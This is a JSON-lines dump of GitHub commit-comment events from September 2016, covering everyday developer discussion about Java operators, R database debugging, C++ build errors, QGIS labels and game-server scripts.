{"id":"4515171055","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"MSF-Jarvis/KPSConnect"},"payload":{"comment":{"id":18895592,"position":null,"line":null,"path":null,"commit_id":"0d97775bf42a72959e354ba6684d5ba6aafc8128","created_at":"2016-09-05T05:34:04Z","updated_at":"2016-09-05T05:34:04Z","body":"That explains why it didn't work. Thanks for the help as always!\n\nOn Mon, Sep 5, 2016, 11:01 AM Simao Gomes Viana <notifications@github.com>\nwrote:\n\n> You forgot to increment the preference *runs*.\n>\n> Also, use || (logical or) instead of | bitwise or.\n> || only evaluates the other condition if the first one was not met.\n> | evaluates all conditions.\n>\n> Considering:\n>\n> if(true || false);\n>\n> First condition is true, so the second one won't be evaluated, no matter\n> what it says.\n>\n> if(true | false);\n>\n> This will check both, the first and the second one whether they are true\n> or not.\n>\n> So if(mystring == null || mystring.isEmpty(); will run fine but if(mystring\n> == null | mystring.isEmpty()); will give a NullPointerException because\n> BOTH are evaluated.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/MSF-Jarvis/KPSConnect/commit/0d97775bf42a72959e354ba6684d5ba6aafc8128#commitcomment-18895582>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AMuuGtMt9TVubgCf15GEwMydFP9fiX8rks5qm6kvgaJpZM4J0oHs>\n> .\n>\n"}},"created_at":"2016-09-05T05:34:04Z"}
{"id":"4515171917","type":"CommitCommentEvent","actor":{"login":"ajdamico"},"repo":{"name":"ajdamico/asdfree"},"payload":{"comment":{"id":18895593,"position":null,"line":null,"path":null,"commit_id":"d0b965e9672161da086e30471760d08281b74343","created_at":"2016-09-05T05:34:28Z","updated_at":"2016-09-05T05:34:28Z","body":"doesn't look like it..\r\n\r\n\t> load( paste0( 'R:/American Community Survey/acs' , year , '_1yr.rda' ) )\r\n\t> attributes(acs.m.design)\r\n\t$names\r\n\t [1] \"type\"             \"scale\"            \"rscales\"          \"rho\"              \"call\"            \r\n\t [6] \"combined.weights\" \"pweights\"         \"repweights\"       \"degf\"             \"mse\"             \r\n\t[11] \"db\"              \r\n\r\n\t$class\r\n\t[1] \"DBIrepdesign\"  \"DBIsvydesign\"  \"svyrep.design\"\r\n\r\n\t> acs.m.design$db$dbname\r\n\t[1] \"R:/American Community Survey/MonetDB\"\r\n\t> acs.m.design$db$connection\r\n\tLoading required package: MonetDB.R\r\n\r\n\tAttaching package: ‘MonetDB.R’\r\n\r\n\tThe following objects are masked from ‘package:MonetDBLite’:\r\n\r\n\t\tMonetDB, MonetDB.R, monetdblite, MonetDBLite, MonetDBR, MonetR, RMonetDB, rmonetdblite,\r\n\t\tRMonetDBLite, src_monetdb\r\n\r\n\tAn object of class \"MonetDBEmbeddedConnection\"\r\n\t<S4 Type Object>\r\n\tattr(,\"connenv\")\r\n\t<environment: 0x000000000a3546a0>\r\n\tattr(,\"dbPreExists\")\r\n\t[1] TRUE\r\n\t> acs.m.design$db$tablename\r\n\t[1] \"acs2014_1yr_m\"\r\n\t> acs.m.design$db$dbtype\r\n\t[1] \"MonetDBLite\"\r\n\t> \r\n"}},"created_at":"2016-09-05T05:34:28Z"}
{"id":"4515172177","type":"CommitCommentEvent","actor":{"login":"xdevs23"},"repo":{"name":"MSF-Jarvis/KPSConnect"},"payload":{"comment":{"id":18895594,"position":null,"line":null,"path":null,"commit_id":"0d97775bf42a72959e354ba6684d5ba6aafc8128","created_at":"2016-09-05T05:34:37Z","updated_at":"2016-09-05T05:34:37Z","body":"Np, and it's early in the morning right now and I already derped twice. "}},"created_at":"2016-09-05T05:34:37Z"}
{"id":"4515173140","type":"CommitCommentEvent","actor":{"login":"fritsvanveen"},"repo":{"name":"fritsvanveen/QGIS"},"payload":{"comment":{"id":18895597,"position":null,"line":null,"path":null,"commit_id":"eb0eb126be659c9aa5d1ecbde5ab499dfb494543","created_at":"2016-09-05T05:35:08Z","updated_at":"2016-09-05T05:35:08Z","body":"@nyalldawson On the polygon layer the same thing. But here some labels have red outlines and stay red, when the missing label appears at 0.6 mm. What is the meaning of the red outlines?\r\n![2016-09-05 07_31_50-qgis 2 99 0 - test grenzend](https://cloud.githubusercontent.com/assets/20473145/18238237/3f0c6afe-733b-11e6-9f63-6c4b5ef17675.png)\r\n"}},"created_at":"2016-09-05T05:35:08Z"}
{"id":"4515179923","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"MSF-Jarvis/KPSConnect"},"payload":{"comment":{"id":18895606,"position":null,"line":null,"path":null,"commit_id":"0d97775bf42a72959e354ba6684d5ba6aafc8128","created_at":"2016-09-05T05:38:37Z","updated_at":"2016-09-05T05:38:37Z","body":"Lol 😂😂😂\r\n\r\n>\r\n"}},"created_at":"2016-09-05T05:38:37Z"}
{"id":"4515182613","type":"CommitCommentEvent","actor":{"login":"fritsvanveen"},"repo":{"name":"fritsvanveen/QGIS"},"payload":{"comment":{"id":18895609,"position":null,"line":null,"path":null,"commit_id":"eb0eb126be659c9aa5d1ecbde5ab499dfb494543","created_at":"2016-09-05T05:40:01Z","updated_at":"2016-09-05T05:40:01Z","body":"@nyalldawson At a distance of 1mm the red outlines turn black."}},"created_at":"2016-09-05T05:40:01Z"}
{"id":"4515184230","type":"CommitCommentEvent","actor":{"login":"zhouling2"},"repo":{"name":"pipeway/pipeway-web"},"payload":{"comment":{"id":18895612,"position":null,"line":null,"path":null,"commit_id":"2bec6e6808a34bb4f9952809d85129baf1a4bc17","created_at":"2016-09-05T05:40:50Z","updated_at":"2016-09-05T05:40:50Z","body":"链接和弹窗的修改"}},"created_at":"2016-09-05T05:40:50Z"}
{"id":"4515185335","type":"CommitCommentEvent","actor":{"login":"zhouling2"},"repo":{"name":"pipeway/pipeway-web"},"payload":{"comment":{"id":18895613,"position":null,"line":null,"path":null,"commit_id":"2bec6e6808a34bb4f9952809d85129baf1a4bc17","created_at":"2016-09-05T05:41:25Z","updated_at":"2016-09-05T05:41:25Z","body":"链接和弹窗的修改"}},"created_at":"2016-09-05T05:41:25Z"}
{"id":"4515186009","type":"CommitCommentEvent","actor":{"login":"kaos"},"repo":{"name":"sandstorm-io/capnproto"},"payload":{"comment":{"id":18895614,"position":5,"line":34,"path":"c++/src/capnp/compiler/node-translator.c++","commit_id":"af899ceb5fc1c650090d7ae8ff79e925b1c7e9a9","created_at":"2016-09-05T05:41:46Z","updated_at":"2016-09-05T05:41:46Z","body":"This fails on my Mac (10.11.6):\r\n```\r\nsrc/capnp/compiler/node-translator.c++:34:10: error: use of undeclared identifier 'getenv'\r\n  return getenv(\"CAPNP_IGNORE_ISSUE_344\") == nullptr;\r\n         ^\r\n```\r\n"}},"created_at":"2016-09-05T05:41:46Z"}
{"id":"4515187359","type":"CommitCommentEvent","actor":{"login":"mingxuWang"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":18895615,"position":246,"line":246,"path":"huangyi/role/view.js","commit_id":"db962019134a8a0e608c8343611d15052afdd9fc","created_at":"2016-09-05T05:42:29Z","updated_at":"2016-09-05T05:42:29Z","body":"代码中多处$$http都没有考虑请求失败的情况。"}},"created_at":"2016-09-05T05:42:29Z"}
{"id":"4515188795","type":"CommitCommentEvent","actor":{"login":"SukiTsang"},"repo":{"name":"nus-cs2103-AY1617S1/addressbook-level2"},"payload":{"comment":{"id":18895617,"position":null,"line":null,"path":null,"commit_id":"3eea1eb854d31e34095c6e5cc816a7ac2310822a","created_at":"2016-09-05T05:43:14Z","updated_at":"2016-09-05T05:43:14Z","body":"Convert the parse(...) method of the Parser class to a class-level method"}},"created_at":"2016-09-05T05:43:14Z"}
{"id":"4515189041","type":"CommitCommentEvent","actor":{"login":"ccrama"},"repo":{"name":"ccrama/Slide"},"payload":{"comment":{"id":18895618,"position":null,"line":null,"path":null,"commit_id":"8022521f1fb14d7c7824a6437676901e60e873ed","created_at":"2016-09-05T05:43:21Z","updated_at":"2016-09-05T05:43:21Z","body":"I actually think I agree with you on this one, it's a band-aid on a bigger issue "}},"created_at":"2016-09-05T05:43:21Z"}
{"id":"4515191046","type":"CommitCommentEvent","actor":{"login":"tanjunior"},"repo":{"name":"disdain13/PokeRoadie"},"payload":{"comment":{"id":18895620,"position":null,"line":null,"path":null,"commit_id":"2257dd1a04a5a8e94485471d4556d3752db19814","created_at":"2016-09-05T05:44:23Z","updated_at":"2016-09-05T05:44:23Z","body":"Wow"}},"created_at":"2016-09-05T05:44:23Z"}
{"id":"4515194874","type":"CommitCommentEvent","actor":{"login":"xdevs23"},"repo":{"name":"MSF-Jarvis/KPSConnect"},"payload":{"comment":{"id":18895623,"position":null,"line":null,"path":null,"commit_id":"0d97775bf42a72959e354ba6684d5ba6aafc8128","created_at":"2016-09-05T05:46:24Z","updated_at":"2016-09-05T05:46:24Z","body":"What would you expect else, I just edited the comment twice :joy:"}},"created_at":"2016-09-05T05:46:24Z"}
{"id":"4515197508","type":"CommitCommentEvent","actor":{"login":"revi"},"repo":{"name":"librewiki/liberty-xe-skin"},"payload":{"comment":{"id":18895629,"position":4,"line":12,"path":"_footer.html","commit_id":"55544bf43ecb81ece65b324bbeb8f8ba2c0300fb","created_at":"2016-09-05T05:47:35Z","updated_at":"2016-09-05T05:47:35Z","body":"인덴트 어휴"}},"created_at":"2016-09-05T05:47:35Z"}
{"id":"4515198536","type":"CommitCommentEvent","actor":{"login":"rashiq"},"repo":{"name":"kiwix/kiwix"},"payload":{"comment":{"id":18895631,"position":null,"line":null,"path":null,"commit_id":"f23b13dd594c264d00b1601274be95711ab3152d","created_at":"2016-09-05T05:47:56Z","updated_at":"2016-09-05T05:47:56Z","body":"<3"}},"created_at":"2016-09-05T05:47:56Z"}
{"id":"4515200219","type":"CommitCommentEvent","actor":{"login":"ashwiniGIT"},"repo":{"name":"ashwiniGIT/HelloWorld"},"payload":{"comment":{"id":18895638,"position":null,"line":null,"path":null,"commit_id":"04d1aaec3016d059a3b4849b0ff92c40d5226d27","created_at":"2016-09-05T05:48:47Z","updated_at":"2016-09-05T05:48:47Z","body":"finished my updates"}},"created_at":"2016-09-05T05:48:47Z"}
{"id":"4515204091","type":"CommitCommentEvent","actor":{"login":"ashwiniGIT"},"repo":{"name":"ashwiniGIT/HelloWorld"},"payload":{"comment":{"id":18895646,"position":null,"line":null,"path":null,"commit_id":"04d1aaec3016d059a3b4849b0ff92c40d5226d27","created_at":"2016-09-05T05:50:34Z","updated_at":"2016-09-05T05:50:34Z","body":"Leave a comment"}},"created_at":"2016-09-05T05:50:34Z"}
{"id":"4515211151","type":"CommitCommentEvent","actor":{"login":"ly29"},"repo":{"name":"nortikin/sverchok"},"payload":{"comment":{"id":18895661,"position":null,"line":null,"path":null,"commit_id":"c86190f96bf659deb6c0de3bf52cdfdf3c8cf665","created_at":"2016-09-05T05:53:57Z","updated_at":"2016-09-05T05:53:57Z","body":"So this is new feature for python 3.5, which blender 2.77 and higher uses.\r\nhttps://www.python.org/dev/peps/pep-0448/\r\nI this case it could be worked around by writing, but there is not guarantee that other problems will keep coming up.\r\n\r\n```python\r\nset_multiple_attrs(m, direction=-1, **socket_ref)\r\n```\r\n\r\nI believe in moving forward and making a stable version 0.5.4 something for older version and keep pushing forward using new features.\r\nhttp://www.blendernation.com/2016/02/26/blender-2-77-will-drop-support-for-windows-xp/\r\n\r\n@zeffii \r\nany comments?"}},"created_at":"2016-09-05T05:53:57Z"}
{"id":"4515211950","type":"CommitCommentEvent","actor":{"login":"bigretromike"},"repo":{"name":"bigretromike/nakamori"},"payload":{"comment":{"id":18895662,"position":null,"line":null,"path":null,"commit_id":"46adb22e814071c3e908ff047b3fb7d99af68b9a","created_at":"2016-09-05T05:54:19Z","updated_at":"2016-09-05T05:54:19Z","body":"What you want query ? Kodi? Jmm? External database ?\n\nOn September 4, 2016 6:38:34 PM GMT+02:00, da3dsoul <notifications@github.com> wrote:\n>I want to figure out how to do an SQL query to search by cast. After\n>that, I have a reason to cut the cast completely from normal contracts.\n>We request the cast separately via a context menu, and populate a new\n>list that is the cast we can search by.\n>\n>-- \n>You are receiving this because you commented.\n>Reply to this email directly or view it on GitHub:\n>https://github.com/bigretromike/nakamori/commit/46adb22e814071c3e908ff047b3fb7d99af68b9a#commitcomment-18893548\n\n-- \nSent from my Android device with K-9 Mail. Please excuse my brevity."}},"created_at":"2016-09-05T05:54:19Z"}
{"id":"4515214494","type":"CommitCommentEvent","actor":{"login":"JorgeAlfredoT"},"repo":{"name":"JorgeAlfredoT/Ejercicios"},"payload":{"comment":{"id":18895667,"position":null,"line":null,"path":null,"commit_id":"3629e9b1e781e5559ecb99e79252d88390a6ecd7","created_at":"2016-09-05T05:55:30Z","updated_at":"2016-09-05T05:55:30Z","body":"98"}},"created_at":"2016-09-05T05:55:30Z"}
{"id":"4515216387","type":"CommitCommentEvent","actor":{"login":"JorgeAlfredoT"},"repo":{"name":"JorgeAlfredoT/Ejercicios"},"payload":{"comment":{"id":18895671,"position":null,"line":null,"path":null,"commit_id":"3629e9b1e781e5559ecb99e79252d88390a6ecd7","created_at":"2016-09-05T05:56:24Z","updated_at":"2016-09-05T05:56:24Z","body":"celsius"}},"created_at":"2016-09-05T05:56:24Z"}
{"id":"4515218709","type":"CommitCommentEvent","actor":{"login":"da3dsoul"},"repo":{"name":"bigretromike/nakamori"},"payload":{"comment":{"id":18895674,"position":null,"line":null,"path":null,"commit_id":"46adb22e814071c3e908ff047b3fb7d99af68b9a","created_at":"2016-09-05T05:57:32Z","updated_at":"2016-09-05T05:57:32Z","body":"I need to know how to build the xref table and query it so I can implement it in JMM."}},"created_at":"2016-09-05T05:57:32Z"}
{"id":"4515220616","type":"CommitCommentEvent","actor":{"login":"syf123456"},"repo":{"name":"syf123456/MyDocument"},"payload":{"comment":{"id":18895680,"position":null,"line":null,"path":null,"commit_id":"a01afc788a6a55699071bb131a37c2d692515ef5","created_at":"2016-09-05T05:58:29Z","updated_at":"2016-09-05T05:58:29Z","body":"sdq"}},"created_at":"2016-09-05T05:58:29Z"}
{"id":"4515222097","type":"CommitCommentEvent","actor":{"login":"junaidshah111"},"repo":{"name":"junaidshah111/helloworld"},"payload":{"comment":{"id":18895683,"position":null,"line":null,"path":null,"commit_id":"949dc8375ad83e875c1be4d63ee7744cddb8e980","created_at":"2016-09-05T05:59:13Z","updated_at":"2016-09-05T05:59:13Z","body":"hello everyone...!!!!\r\n"}},"created_at":"2016-09-05T05:59:13Z"}
{"id":"4515225931","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18895722,"position":null,"line":null,"path":null,"commit_id":"df66d6ef4a8c1ba4a30aab3f42bf5ebf3f70ffda","created_at":"2016-09-05T06:00:47Z","updated_at":"2016-09-05T06:00:47Z","body":"Yeah, it doesn't matter. Either set it BLANK or try with another function. As long as it works."}},"created_at":"2016-09-05T06:00:47Z"}
{"id":"4515227754","type":"CommitCommentEvent","actor":{"login":"baibaiyan"},"repo":{"name":"baibaiyan/history"},"payload":{"comment":{"id":18895732,"position":null,"line":null,"path":null,"commit_id":"28d67f9007d09523c33376712dfae684006d3f24","created_at":"2016-09-05T06:01:41Z","updated_at":"2016-09-05T06:01:41Z","body":"## ****sdd``**********__**\r\n### [*ddddddddddddd](url)``"}},"created_at":"2016-09-05T06:01:41Z"}
{"id":"4515233959","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18895747,"position":null,"line":null,"path":null,"commit_id":"1ba6af016889aa001a0cacc2ef9135631fd02920","created_at":"2016-09-05T06:04:33Z","updated_at":"2016-09-05T06:04:33Z","body":"Is it tested?"}},"created_at":"2016-09-05T06:04:33Z"}
{"id":"4515239698","type":"CommitCommentEvent","actor":{"login":"boxa"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18895760,"position":71,"line":990,"path":"src/scriptdev2/scripts/eastern_kingdoms/stratholme/instance_stratholme.cpp","commit_id":"a57f2e8db0357dcd12eee10e7bf1c16c4a904e6b","created_at":"2016-09-05T06:07:09Z","updated_at":"2016-09-05T06:07:09Z","body":"else \r\n     m_uiGateTrapTimers[i][0] -= uiDiff;"}},"created_at":"2016-09-05T06:07:09Z"}
{"id":"4515239715","type":"CommitCommentEvent","actor":{"login":"Eremela"},"repo":{"name":"Eremela/Debelle"},"payload":{"comment":{"id":18895761,"position":null,"line":null,"path":null,"commit_id":"36f447163c379015708b170039f4138e149c81b7","created_at":"2016-09-05T06:07:10Z","updated_at":"2016-09-05T06:07:10Z","body":"sfbvdvfbjhbfoibhfihbfb"}},"created_at":"2016-09-05T06:07:10Z"}
{"id":"4515239873","type":"CommitCommentEvent","actor":{"login":"fititnt"},"repo":{"name":"webiwg/webiwg-issues"},"payload":{"comment":{"id":18895762,"position":null,"line":null,"path":null,"commit_id":"47774dd466f178cf3f79c61ea1358ead4b94764a","created_at":"2016-09-05T06:07:13Z","updated_at":"2016-09-05T06:07:13Z","body":"Ops. Isso referencia na verdade o #7 "}},"created_at":"2016-09-05T06:07:13Z"}
{"id":"4515239968","type":"CommitCommentEvent","actor":{"login":"boxa"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18895763,"position":66,"line":985,"path":"src/scriptdev2/scripts/eastern_kingdoms/stratholme/instance_stratholme.cpp","commit_id":"a57f2e8db0357dcd12eee10e7bf1c16c4a904e6b","created_at":"2016-09-05T06:07:16Z","updated_at":"2016-09-05T06:07:16Z","body":"del"}},"created_at":"2016-09-05T06:07:16Z"}
{"id":"4515243469","type":"CommitCommentEvent","actor":{"login":"Harald67"},"repo":{"name":"Harald67/c150"},"payload":{"comment":{"id":18895765,"position":null,"line":null,"path":null,"commit_id":"9e85a59bd98a6e97b9c7fc68f6bf57523c06c8c6","created_at":"2016-09-05T06:08:55Z","updated_at":"2016-09-05T06:08:55Z","body":"You should not work on the model because I have no clue how we can merge our changes.\r\n"}},"created_at":"2016-09-05T06:08:55Z"}
{"id":"4515243841","type":"CommitCommentEvent","actor":{"login":"cyrus-a-bishop"},"repo":{"name":"qixuanHou/Georgia-Tech-Tutors-Database-Management-Information-System-"},"payload":{"comment":{"id":18895766,"position":13,"line":13,"path":"CS4400final.py","commit_id":"fc2a45da54d7a7d5060289247b961faac37e3124","created_at":"2016-09-05T06:09:06Z","updated_at":"2016-09-05T06:09:06Z","body":"Classic "}},"created_at":"2016-09-05T06:09:06Z"}
{"id":"4515246700","type":"CommitCommentEvent","actor":{"login":"SH-M"},"repo":{"name":"IAHM-COL/KingAir-350"},"payload":{"comment":{"id":18895770,"position":null,"line":null,"path":null,"commit_id":"a5e31b6e2c08e917392ec0f273332f4cfac29cea","created_at":"2016-09-05T06:10:25Z","updated_at":"2016-09-05T06:10:25Z","body":"Awesome stuff :+1: \r\n\r\nWho wants to add the ALS landing light? :wink: "}},"created_at":"2016-09-05T06:10:25Z"}
{"id":"4515249937","type":"CommitCommentEvent","actor":{"login":"hannesmuehleisen"},"repo":{"name":"ajdamico/asdfree"},"payload":{"comment":{"id":18895779,"position":null,"line":null,"path":null,"commit_id":"d0b965e9672161da086e30471760d08281b74343","created_at":"2016-09-05T06:12:00Z","updated_at":"2016-09-05T06:12:00Z","body":"the db name is a folder perhaps i added some exception somewhere"}},"created_at":"2016-09-05T06:12:00Z"}
{"id":"4515252900","type":"CommitCommentEvent","actor":{"login":"melonmanchan"},"repo":{"name":"bqqbarbhg/compiler"},"payload":{"comment":{"id":18895782,"position":null,"line":null,"path":null,"commit_id":"79660daebba94910317a4fbe9c328bd691f10553","created_at":"2016-09-05T06:13:23Z","updated_at":"2016-09-05T06:13:23Z","body":":clap: "}},"created_at":"2016-09-05T06:13:23Z"}
{"id":"4515253604","type":"CommitCommentEvent","actor":{"login":"D-ECHO"},"repo":{"name":"Harald67/c150"},"payload":{"comment":{"id":18895784,"position":null,"line":null,"path":null,"commit_id":"9e85a59bd98a6e97b9c7fc68f6bf57523c06c8c6","created_at":"2016-09-05T06:13:44Z","updated_at":"2016-09-05T06:13:44Z","body":"Ok sry\n\npls push your changes, I will merge them.\n\nAm 05.09.2016 um 08:08 schrieb Harald JOHNSEN:\n>\n> You should not work on the model because I have no clue how we can \n> merge our changes.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/Harald67/c150/commit/9e85a59bd98a6e97b9c7fc68f6bf57523c06c8c6#commitcomment-18895765>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/ALtQ-KyGSbGcRXMtVBt9dNirMiFHWWjbks5qm7H4gaJpZM4J0xC6>.\n>\n\n"}},"created_at":"2016-09-05T06:13:44Z"}
{"id":"4515253877","type":"CommitCommentEvent","actor":{"login":"cybernovice"},"repo":{"name":"cybernovice/hello-world"},"payload":{"comment":{"id":18895786,"position":2,"line":2,"path":"README.md","commit_id":"5750ba1ea90fae258634b117993c3e0fa315df2c","created_at":"2016-09-05T06:13:53Z","updated_at":"2016-09-05T06:13:53Z","body":"Adding a comment."}},"created_at":"2016-09-05T06:13:53Z"}
{"id":"4515258572","type":"CommitCommentEvent","actor":{"login":"SilongHu"},"repo":{"name":"SilongHu/Leetcode-cpp"},"payload":{"comment":{"id":18895790,"position":null,"line":null,"path":null,"commit_id":"7c15179fb0ded73bf513b6d0c8037a9077456952","created_at":"2016-09-05T06:15:51Z","updated_at":"2016-09-05T06:15:51Z","body":"using the extra memory"}},"created_at":"2016-09-05T06:15:51Z"}
{"id":"4515259700","type":"CommitCommentEvent","actor":{"login":"D-ECHO"},"repo":{"name":"IAHM-COL/KingAir-350"},"payload":{"comment":{"id":18895792,"position":null,"line":null,"path":null,"commit_id":"a5e31b6e2c08e917392ec0f273332f4cfac29cea","created_at":"2016-09-05T06:16:22Z","updated_at":"2016-09-05T06:16:22Z","body":"Don't we already have it?\n\n\nAm 05.09.2016 um 08:10 schrieb SM:\n>\n> Awesome stuff 👍\n>\n> Who wants to add the ALS landing light? 😉\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/IAHM-COL/KingAir-350/commit/a5e31b6e2c08e917392ec0f273332f4cfac29cea#commitcomment-18895770>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/ALtQ-Lr_w-fceJlIRbetbcQDM5gclunNks5qm7JRgaJpZM4J0xFI>.\n>\n\n"}},"created_at":"2016-09-05T06:16:22Z"}
{"id":"4515261418","type":"CommitCommentEvent","actor":{"login":"boxa"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18895793,"position":5,"line":62,"path":"src/game/AI/CreatureAISelector.cpp","commit_id":"8835ddf39694260c2234c0ca4b3c54e705aa44ff","created_at":"2016-09-05T06:16:59Z","updated_at":"2016-09-05T06:16:59Z","body":"@Phatcat, \r\n\"when a mob which has no EventAI set is automatically given GuardianAI \" - yes .\r\n\r\nas temp solutions i change this line https://github.com/cmangos/mangos-wotlk/blob/master/src/game/AI/CreatureEventAI.cpp#L151\r\nto\r\n    else\r\n    {\r\n        std::string aiName = m_creature->GetAIName();\r\n        if (aiName == \"EventAI\") // don't show error on GuardiansAI\r\n        {\r\n            sLog.outErrorEventAI(\"EventMap for Creature Id: %u, %s is empty but creature is using CreatureEventAI: '%s'.\",\r\n                m_creature->GetEntry(), m_creature->GetGuidStr().c_str(), aiName.c_str());\r\n        }\r\n    }"}},"created_at":"2016-09-05T06:16:59Z"}
{"id":"4515265804","type":"CommitCommentEvent","actor":{"login":"jeetmp3"},"repo":{"name":"spring-projects/spring-security"},"payload":{"comment":{"id":18895799,"position":null,"line":null,"path":null,"commit_id":"3fb77f3b59b781e26b9ae249810ecdfba6306ee8","created_at":"2016-09-05T06:18:50Z","updated_at":"2016-09-05T06:18:50Z","body":"@rwinch just one question here Is it bad practice to use `ObjectUtils.isEmpty()` with normal Objects ?"}},"created_at":"2016-09-05T06:18:50Z"}
{"id":"4515266355","type":"CommitCommentEvent","actor":{"login":"thirstyice"},"repo":{"name":"Aberhart-school/abe-site"},"payload":{"comment":{"id":18895800,"position":null,"line":null,"path":null,"commit_id":"c950db393210fd70dabf3bc03ec766c3b63a6f5d","created_at":"2016-09-05T06:19:04Z","updated_at":"2016-09-05T06:19:04Z","body":"This is the commit that created #181 #179 and #177"}},"created_at":"2016-09-05T06:19:04Z"}
{"id":"4515267155","type":"CommitCommentEvent","actor":{"login":"winlinvip"},"repo":{"name":"ossrs/srs"},"payload":{"comment":{"id":18895801,"position":null,"line":null,"path":null,"commit_id":"c7b97aa1c3de380451e2d229fc5bef702e2d264d","created_at":"2016-09-05T06:19:25Z","updated_at":"2016-09-05T06:19:25Z","body":"https://github.com/ossrs/state-threads/issues/2"}},"created_at":"2016-09-05T06:19:25Z"}
{"id":"4515268673","type":"CommitCommentEvent","actor":{"login":"ryosuketter"},"repo":{"name":"ryosuketter/singlepage-layout"},"payload":{"comment":{"id":18895804,"position":null,"line":null,"path":null,"commit_id":"bdf3b6268025058a87ee4919b9f70d6500c9a8f3","created_at":"2016-09-05T06:20:06Z","updated_at":"2016-09-05T06:20:06Z","body":"p207を参考に作成\r\n"}},"created_at":"2016-09-05T06:20:06Z"}
{"id":"4515269982","type":"CommitCommentEvent","actor":{"login":"bwangel23"},"repo":{"name":"wklken/k-vim"},"payload":{"comment":{"id":18895807,"position":452,"line":391,"path":"vimrc","commit_id":"eaa5cf53219111314325a2ec9a73d17b820cc3b5","created_at":"2016-09-05T06:20:38Z","updated_at":"2016-09-05T06:20:38Z","body":"@flniu ，了解了，谢谢！突然又冒出一个疑问来，<Leader>和<leader>这两者有什么区别啊，我通过`:help Leader`找到了<leader>的说明，但是<leader>没找到，能提示一个help的关键字吗？"}},"created_at":"2016-09-05T06:20:38Z"}
{"id":"4515272053","type":"CommitCommentEvent","actor":{"login":"bwangel23"},"repo":{"name":"wklken/k-vim"},"payload":{"comment":{"id":18895809,"position":5,"line":471,"path":"vimrc","commit_id":"198b0980bdf91e96e1ea8a881df4a24b5cb80c0b","created_at":"2016-09-05T06:21:35Z","updated_at":"2016-09-05T06:21:35Z","body":"@flniu ，懂了，谢谢！"}},"created_at":"2016-09-05T06:21:35Z"}
{"id":"4515274603","type":"CommitCommentEvent","actor":{"login":"MasonKuo"},"repo":{"name":"MasonKuo/MasonKuo.github.io"},"payload":{"comment":{"id":18895814,"position":4,"line":3,"path":"about/index.html","commit_id":"1dacf3e58670f81e468eb7a564fe94585d1128ae","created_at":"2016-09-05T06:22:42Z","updated_at":"2016-09-05T06:22:42Z","body":"Help?"}},"created_at":"2016-09-05T06:22:42Z"}
{"id":"4515274918","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":18895815,"position":null,"line":null,"path":null,"commit_id":"b0d04033729d08203c0143caf0499627c07e04d0","created_at":"2016-09-05T06:22:48Z","updated_at":"2016-09-05T06:22:48Z","body":"Fix in what sense?"}},"created_at":"2016-09-05T06:22:48Z"}
{"id":"4515281215","type":"CommitCommentEvent","actor":{"login":"boxa"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18895848,"position":null,"line":null,"path":null,"commit_id":"8835ddf39694260c2234c0ca4b3c54e705aa44ff","created_at":"2016-09-05T06:25:30Z","updated_at":"2016-09-05T06:25:30Z","body":"i found the reason why this is happening.\r\nwhen we change EventAI to GuardiansAI for creature in the world (not summoned), in this case creature has no owner."}},"created_at":"2016-09-05T06:25:30Z"}
{"id":"4515281328","type":"CommitCommentEvent","actor":{"login":"ligangty"},"repo":{"name":"ligangty/galley"},"payload":{"comment":{"id":18895849,"position":null,"line":null,"path":null,"commit_id":"e5473cc25f2a3f07e3cb9fa8ca5d4f71c21e20e9","created_at":"2016-09-05T06:25:33Z","updated_at":"2016-09-05T06:25:33Z","body":"Hi, @jcasey. \r\n I have some concerns for the RoutingCacheProviderWrapper, because I really don't think this wrapper is needed if we have provided the CacheProviderRouter(Of course precondition is this router is doing the right thing). The third-party lib depend on galley(like indy) can define their own cache provider routing rule using SpecialPathMatcher, and get the correct one from the map. If a wrapper is there, so many redundant method needs to be defined like the commit show there. What do you think of this?"}},"created_at":"2016-09-05T06:25:33Z"}
{"id":"4515283887","type":"CommitCommentEvent","actor":{"login":"srikanthch888"},"repo":{"name":"srikanthch888/SS"},"payload":{"comment":{"id":18895855,"position":null,"line":null,"path":null,"commit_id":"2b83e58db68e21a10c618f4a01bb7a5fc89b7ccf","created_at":"2016-09-05T06:26:35Z","updated_at":"2016-09-05T06:26:35Z","body":"{*//Source game control-888#//-SS*(Unity-Game-collection)}"}},"created_at":"2016-09-05T06:26:35Z"}
{"id":"4515287325","type":"CommitCommentEvent","actor":{"login":"SH-M"},"repo":{"name":"IAHM-COL/KingAir-350"},"payload":{"comment":{"id":18895858,"position":null,"line":null,"path":null,"commit_id":"a5e31b6e2c08e917392ec0f273332f4cfac29cea","created_at":"2016-09-05T06:27:53Z","updated_at":"2016-09-05T06:27:53Z","body":"ALS landing lights?\nI couldn't see one, let me check\n\nOn 5 Sep 2016 11:46, \"D-ECHO\" <notifications@github.com> wrote:\n\n> Don't we already have it?\n>\n>\n> Am 05.09.2016 um 08:10 schrieb SM:\n> >\n> > Awesome stuff 👍\n> >\n> > Who wants to add the ALS landing light? 😉\n> >\n> > —\n> > You are receiving this because you are subscribed to this thread.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/IAHM-COL/KingAir-350/commit/\n> a5e31b6e2c08e917392ec0f273332f4cfac29cea#commitcomment-18895770>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/ALtQ-Lr_w-\n> 